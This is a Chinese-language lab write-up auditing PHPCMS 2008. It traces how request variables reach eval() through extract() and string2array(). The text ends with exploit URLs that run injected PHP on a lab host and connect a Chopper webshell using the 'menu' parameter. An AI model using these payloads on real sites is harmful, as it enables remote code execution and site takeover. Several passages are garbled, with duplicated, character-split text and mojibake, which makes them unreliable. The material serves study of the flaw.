一、 启动环境
1.双击运行桌面phpstudy.exe软件
2.点击启动按钮,启动服务器环境
二、代码审计
1.双击启动桌面Seay源代码审计系统软件
3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ phpcms 2008),点击确定
漏洞分析
1.点击展开/yp/web/include/common.inc.php
<?php
defined('IN_PHPCMS') or exit('Access Denied');
$userid = $userid ? $userid : intval(QUERY_STRING);
$r = $db->get_one("SELECT * FROM `".DB_PRE."member_company` WHERE `userid`='$userid'");
if($r)
{
extract($r);
}
if(!$userid)
{
$MS['title'] = '浣犺璁块棶鐨勭珯鐐逛笉瀛樺湪';
$MS['description'] = '璇锋牳瀵圭綉鍧€鏄惁姝g‘.';
$MS['urls'][0] = array(
'name'=>'璁块棶缃戠珯棣栭〉',
'url'=>$PHPCMS['siteurl'],
);
$MS['urls'][1] = array(
'name'=>'娉ㄥ唽涓烘湰绔欎細鍛?,
'url'=>$PHPCMS['siteurl'].'member/register.php',
);
msg($MS);
}
程序首先赋值一个 u s e r i d 变 量 , 然 后 使 用 赋 值 完 成 变 量 拼 接 s q l 语 句 执 行 , S Q L 语 句 执 行 完 成 以 后 返 回 数 据 给 userid变量,然后使用赋值完成变量拼接sql语句执行,SQL语句执行完成以后返回数据给 userid变量,然后使用赋值完成变量拼接sql语句执行,SQL语句执行完成以后返回数据给r变量数组,如果 r 变 量 存 在 内 容 , 则 将 变 量 数 组 内 容 加 入 到 当 前 文 件 的 符 号 表 中 。 如 果 r变量存在内容,则将变量数组内容加入到当前文件的符号表中。如果 r变量存在内容,则将变量数组内容加入到当前文件的符号表中。如果userid变量内容为false则将显示错误页面内容,但是目前 u s e r i d 并 没 有 找 到 在 哪 里 获 取 。 2. 如 果 userid并没有找到在哪里获取。 2.如果 userid并没有找到在哪里获取。2.如果userid不为false,则接着往下执行
if(empty($tplname)) $tplname = 'default';
//用户选择的默认模板
$companytpl_config = include PHPCMS_ROOT.'templates/'.TPL_NAME.'/yp/companytplnames.php';
$tpl = $companytpl_config[$tplname]['tplname'];
define('TPL', $tpl);
define('WEB_SKIN', 'templates/'.TPL_NAME.'/yp/css/');
if($diy)
{
define('SKIN_DIY', WEB_SKIN.$userid.'_diy.css');
}
else
{
define('SKIN_DIY', WEB_SKIN.$companytpl_config[$tplname]['style']);
}
$menu = string2array($menu);
代码接着进行初始化模板文件,最后将
m
e
n
u
变
量
传
输
到
s
t
r
i
n
g
2
a
r
r
a
y
(
)
函
数
,
目
前
又
来
疑
问
,
menu变量传输到string2array()函数,目前又来疑问,
menu变量传输到string2array()函数,目前又来疑问,menu变量从何而来?
3.现在需要了解一下string2array()到底什么作用,string2array函数存放在include/global.func.php
function string2array($data)
{
if($data == '') return array();
eval("\$array = $data;");
return $array;
}
看到函数发现,内部有eval敏感函数,并且把传送过去的
m
e
n
u
进
行
执
行
,
现
在
有
这
么
个
假
设
,
如
果
menu进行执行,现在有这么个假设,如果
menu进行执行,现在有这么个假设,如果menu变量可以控制,那么完全进行任意代码执行。
4.目前成立这个假设
u
s
e
r
i
d
主
要
是
为
了
去
数
据
库
查
询
内
容
,
然
后
将
返
回
的
内
容
构
成
一
个
数
组
,
使
用
e
x
t
r
a
c
t
(
)
将
数
组
的
内
容
添
加
到
当
前
符
号
表
中
,
从
而
也
就
生
成
userid主要是为了去数据库查询内容,然后将返回的内容构成一个数组,使用extract()将数组的内容添加到当前符号表中,从而也就生成
userid主要是为了去数据库查询内容,然后将返回的内容构成一个数组,使用extract()将数组的内容添加到当前符号表中,从而也就生成menu变量,如果能够让数据库返回空,不让他覆盖或者生成新的
m
e
n
u
变
量
,
然
后
在
别
的
位
置
生
成
新
的
menu变量,然后在别的位置生成新的
menu变量,然后在别的位置生成新的menu变量,从而执行想执行代码。
5.在include/common.inc.php文件中,会将GET、POST、Cookie转换成变量
if($_REQUEST)
{
if(MAGIC_QUOTES_GPC)
{
$_REQUEST = new_stripslashes($_REQUEST);
if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);
extract($db->escape($_REQUEST), EXTR_SKIP);
}
else
{
$_POST = $db->escape($_POST);
$_GET = $db->escape($_GET);
$_COOKIE = $db->escape($_COOKIE);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_COOKIE,EXTR_SKIP);
}
if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS);
if($_COOKIE) $db->escape($_COOKIE);
}
所以可以利用这个位置提前生成 m e n u 变 量 和 menu变量和 menu变量和userid变量,并且把 u s e r i d 内 容 置 位 数 据 库 不 存 在 的 内 容 , userid内容置位数据库不存在的内容, userid内容置位数据库不存在的内容,menu变量内容为想要执行的代码。
漏洞利用
1.访问
http://192.168.91.136/phpcms/yp/web/index.php?userid=1234324&menu=phpinfo();exit;
菜刀直接连接
http://192.168.91.136/phpcms/yp/web/index.php?userid=1234324&menu=exit;
//密码 menu